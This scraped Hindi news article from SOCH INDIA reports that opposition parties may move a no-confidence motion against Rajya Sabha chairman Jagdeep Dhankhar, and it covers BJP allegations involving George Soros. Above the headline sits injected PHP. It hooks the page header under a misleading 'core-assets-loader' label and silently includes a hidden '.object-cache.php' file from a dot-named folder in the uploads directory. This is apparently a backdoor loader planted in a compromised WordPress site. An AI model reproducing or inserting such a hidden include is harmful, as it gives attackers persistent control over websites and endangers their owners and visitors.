add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); राज्यसभा के चेयरमैन जगदीप धनखड़ के खिलाफ विपक्ष ला सकता है अविश्वास प्रस्ताव! – SOCH INDIA
Menu

देश
राज्यसभा के चेयरमैन जगदीप धनखड़ के खिलाफ विपक्ष ला सकता है अविश्वास प्रस्ताव!

nobanner

राज्यसभा के सभापति जगदीप धनखड़ के खिलाफ विपक्ष अविश्वास प्रस्ताव ला सकता है. विपक्ष से जुड़ी हुई कुछ पार्टियों ने चेयरमैन के खिलाफ अविश्वास प्रस्ताव लाने को लेकर चर्चा शुरू की है. हालांकि इसको लेकर अभी कोई आम सहमति नहीं बन पाई है. अगले एक-दो दिनों में इस पर आम सहमति बनाने का काम किया जाएगा.

राज्यसभा में सोमवार को भारतीय जनता पार्टी (भाजपा) ने कांग्रेस के शीर्ष नेताओं पर अरबपति निवेशक जॉर्ज सोरोस के साथ मिलकर देश को अस्थिर करने का आरोप लगाया. कार्यवाही के दौरान, सभापति जगदीप धनखड़ ने भारत की एकता और संप्रभुता के लिए आंतरिक और बाहरी खतरों के बारे में चिंता जाहिर की और आगाह किया कि “डीप स्टेट” का प्रभाव “कोविड बीमारी से भी अधिक घातक है.”